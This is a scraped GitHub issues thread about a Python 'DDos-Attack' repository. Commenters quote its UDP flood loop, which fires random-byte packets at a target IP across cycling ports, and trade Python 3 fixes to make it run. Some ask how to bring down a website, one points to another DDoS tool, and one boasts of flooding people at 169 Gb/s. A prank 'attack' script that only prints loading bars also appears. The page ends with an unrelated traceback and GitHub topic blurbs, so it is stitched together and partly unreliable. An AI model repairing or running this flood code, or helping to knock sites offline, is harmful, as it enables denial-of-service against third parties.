ha3mrx / ddos-attack Goto Github PK
View Code? Open in Web Editor NEWDDos-Attack Is A Python script online Attack
DDos-Attack Is A Python script online Attack
This shows up after running script. Is this something we should have installed locally?
sock.sendto(bytes, (ip,port)) sent = sent + 1 port = port + 1 print "Sent %s packet to %s throught port:%s"%(sent,ip,port) if port == 65534: port = 1
File "ddos.py", line 23
print "Author : HA-MRX"
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("Author : HA-MRX")?
Kindly tell this as fast as possible
I suggest using this tool (https://github.com/ThusInfinity/Dark-Matter-Layer-7-DDoS), bet it hit (unless the target uses strong anti-ddos protection), if you don't believe it, test with dstat or smth.
this was made improperly. after running, my terminal came across 25 errors in the code. this ddos tool is utter shit
I don't understand much in programming. But here is too much syntax errors. And looks like code is fake and do nothing.
Please explain me!
File "ddos-attack.py", line 23
print "Author : HA-MRX"
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("Author : HA-MRX")?
this script is either terribly written or not at all optimized for python3 ?
after having to add parenthesis to every "print" line 23-26,33,35,37,39,47,48
i.e: print "Author : HA-MRX" should = print ("Author : HA-MRX")
I get the following error:
File "/home/hazeyez/ddos/DDos-Attack/ddos-attack.py", line 28, in
ip = raw_input("IP Target : ")
NameError: name 'raw_input' is not defined
raw_input was changed to 'input' for python3 so that needed to be edited.
once all of these changes were made, the script ran, but i got the error sh: 1: figlet: not found
after entering the IP & Port, I got the following error:
sh: 1: figlet: not found
[ ] 0%
[===== ] 25%
[========== ] 50%
[=============== ] 75%
[====================] 100%
Traceback (most recent call last):
File "/home/hazeyez/ddos/DDos-Attack/ddos-attack.py", line 45, in
sock.sendto(bytes, (ip,port))
TypeError: an integer is required (got type str)
做的挺像的效果差点给我糊弄住了
would please add input field for fake ip, thank you
This tool is ridiculously broken and inefficient. When I improved it and ran it on my computer, it sent packets at about 3 Gbps, and I only received packets at 40 Kbps!!! Here is the new and improved code:
the tool is not working
my life
git clone https://github.com/Ha3MrX/DDos-Attack
This thing just makes me ddos myself
please please please tell me this is some April fools joke. if it is ill be honest i love it. but seriously, judging my the amount of incredibly intelligent people submitting issues and taking it seriously i highly doubt thats a case. Ill just pretend this is god tier b8.
I would expect 99% of people who come across this tool to know that it's fake. But apparently, 421 people exist who believe this tool is real! There are 421 forks on this trash. Someone should go track them down and post them on reddit at r/masterhacker.
import sys
import os
import time
import socket
import random
#Code Time
#from datetime import datetime
#now = datetime.now()
#hour = now.hour
#minute = now.minute
#day = now.day
#month = now.month
#year = now.year
#print("date: "+year+"/"+month+"/"+day+" | time: "+hour+":"+minute)
os.system("color 8A")
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
md = input("press Enter to start or s and enter to settings>>> ")
if md == "s" :
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
print("Settings: ")
print
print(" color - change cmd color")
setac = input(" type action: ")
print
print
print("actions: ")
if setac == "color":
print(" 0 = Black 8 = Gray")
print(" 1 = Blue 9 = Light Blue")
print(" 2 = Green A = Light Green")
print(" 3 = Aqua B = Light Aqua")
print(" 4 = Red C = Light Red")
print(" 5 = Purple D = Light Purple")
print(" 6 = Yellow E = Light Yellow")
print(" 7 = White F = Bright White")
print
print(" color code is 2 chars char 1: background color char 2: text color")
print(" for example: 70 will be Black text with white background")
print
print
clrset = input(" type color>>> ")
os.system("color "+clrset)
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
ip = input(" IP Target >>> ")
port = input(" Port >>> ")
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
print ("[ ] 0%")
time.sleep(0.5)
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
print ("[= ] 1%")
time.sleep(0.5)
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
print ("[== ] 5%")
time.sleep(0.5)
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
print ("[==== ] 10%")
time.sleep(0.5)
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
print ("[=========== ] 50%")
time.sleep(0.5)
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
print ("[=============== ] 70%")
time.sleep(0.5)
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
print ("[================== ] 80%")
time.sleep(0.5)
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
print ("[=====================] 100%")
time.sleep(0.3)
os.system("cls")
print("loading.")
print("starting DDoS")
time.sleep(0.3)
os.system("cls")
print("loading..")
print("starting DDoS")
time.sleep(0.3)
os.system("cls")
print("loading...")
print("starting DDoS")
time.sleep(0.3)
os.system("cls")
print("loading....")
print("starting DDoS")
time.sleep(0.3)
os.system("cls")
print("loading.....")
print("starting DDoS")
time.sleep(0.3)
os.system("cls")
print("loading......")
print("Connecting to DDoS server")
time.sleep(0.3)
os.system("cls")
print("loading.......")
print("Connecting to DDoS server")
time.sleep(0.3)
os.system("cls")
print("loading........")
print("Connecting to DDoS server")
time.sleep(0.3)
os.system("cls")
print("loading.")
print("Connecting to DDoS server")
time.sleep(0.3)
os.system("cls")
print("loading..")
print("Connecting to DDoS server")
time.sleep(0.3)
print("Connected")
time.sleep(2)
os.system("cls")
print("loading...")
print("sending ip:port to the server")
time.sleep(0.3)
os.system("cls")
print("loading....")
print("sending ip:port to the server")
time.sleep(0.3)
os.system("cls")
print("loading.....")
print("sending ip:port to the server")
time.sleep(0.3)
os.system("cls")
print("loading......")
print("sending ip:port to the server")
time.sleep(0.3)
os.system("cls")
print("loading.......")
print("sending ip:port to the server")
time.sleep(0.3)
os.system("cls")
print("loading........")
print("sending ip:port to the server")
time.sleep(0.3)
os.system("cls")
print("loading.")
print("sending ip:port to the server")
print("sent and comfirmed by server")
time.sleep(2)
os.system("cls")
print("loading..")
print("waiting for server to start the attack")
time.sleep(0.3)
os.system("cls")
print("loading...")
print("waiting for server to start the attack")
time.sleep(0.3)
os.system("cls")
print("loading....")
print("waiting for server to start the attack")
time.sleep(0.3)
os.system("cls")
print("loading.....")
print("waiting for server to start the attack")
time.sleep(0.3)
os.system("cls")
print("loading......")
print("waiting for server to start the attack")
time.sleep(0.3)
os.system("cls")
print("loading.......")
print("waiting for server to start the attack")
print("server started the attack")
time.sleep(2)
os.system("cls")
print("loading........")
print("comfirming details")
time.sleep(0.3)
os.system("cls")
print("loading.")
print("comfirming details")
time.sleep(0.3)
os.system("cls")
print("loading..")
print("comfirming details")
time.sleep(0.3)
os.system("cls")
print("loading...")
print("comfirming details")
time.sleep(0.3)
os.system("cls")
print("loading....")
print("comfirming details")
time.sleep(0.3)
os.system("cls")
print("loading.....")
print("comfirming details")
time.sleep(0.3)
os.system("cls")
print("loading......")
print("comfirming details")
time.sleep(0.3)
os.system("cls")
print("loading.......")
print("comfirming details")
time.sleep(0.3)
os.system("cls")
print("loading........")
print("comfirming details")
print("comfirmed")
time.sleep(2)
os.system("cls")
print(" ██ ██ ████ ██ ██ ██ ██ ████ ██████")
print(" ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██")
print(" ████ ██████ ██████████ ████ ██████ ██████")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print(" ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██")
print
print
print(ip+" is now being attacked by you! form port "+port)
time.sleep(0.2)
stop = input("to stop attack type stop >>> ")
if stop == "stop":
os.system("cls")
print("sending stop command to the server...")
time.sleep(3)
input("attack ended. to exit press enter")
exit()
else:
input("command <"+stop+"> is not defind. attack is still on, to exit press: Enter")
the site breaks the connection after we start the attack, so it makes it impossible to bring down the site, you know how to fix it?
Ahyenno rabotaet
Thanks Ha3MrX,
Ive been looking for DDOS tools for so so so long and all the shit i try and get are a virus or fake but thanks this script works and the source code is so easy to install ;)
I cant wait to use it some more, if people talk shit well.... Thanks to u i can hit people with 169Gb/per second. but lol i love the 69 but im so glad this powerful took works.
thanks
snapchat @asd_don
恶作剧有意思吗?蠢货
God ?
这个脚本只是做到让自己打不开网页而已,用其他主机照样打开网站,看了一眼源码很糟糕,这是愚人节不错的礼物(源码就是做几个延迟函数+循环 print "[ ] 0% " time.sleep(5) print "[===== ] 25%" time.sleep(5) print "[========== ] 50%" time.sleep(5) print "[=============== ] 75%" time.sleep(5)//停5秒 (没有任何意义 并没有加载) print "[====================] 100%" time.sleep(3) sent = 0 while True: sock.sendto(bytes, (ip,port)) sent = sent + 1 port = port + 1 print "Sent %s packet to %s throught port:%s"%(sent,ip,port) if port == 65534://循环判断这个数是否等于65534 如果等于 port=1 然后继续开始循环 port = 1 所以作者最好不要搞恶作剧骗那些萌新了
If the fking issue is soleved cloae the issue then
Originally posted by @TrisuDL in #4 (comment)
#language!
No Issue
Super
I'm use this tool and run program to nano 😊
Super tool
Sorry Bro i'm use this program only run to my termux
I like your tools 😉
Hhh
please help me
Does the attack perform with the machine’s ip adress or fake ip adresses ?
Sorry if my english fails, but im pretty sure this is a joke... And its not even a well built one, the code is filled with flaws, i had to fix everything... Besides... The loading bar is not actually loading anything... It just looks cool
It just crashes upon opening
print "[ ] 0% " time.sleep(5) print "[===== ] 25%" time.sleep(5) print "[========== ] 50%" time.sleep(5) print "[=============== ] 75%" time.sleep(5) print "[====================] 100%" time.sleep(3)
Line 33 in 59e06c4
Traceback (most recent call last):
File "ipgeolocation.py", line 32, in
from core.IpGeoLocationLib import IpGeoLocationLib
File "/root/IPGeoLocation/core/IpGeoLocationLib.py", line 30, in
from core.Utils import Utils
File "/root/IPGeoLocation/core/Utils.py", line 33, in
from urllib import request
ImportError: cannot import name request
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.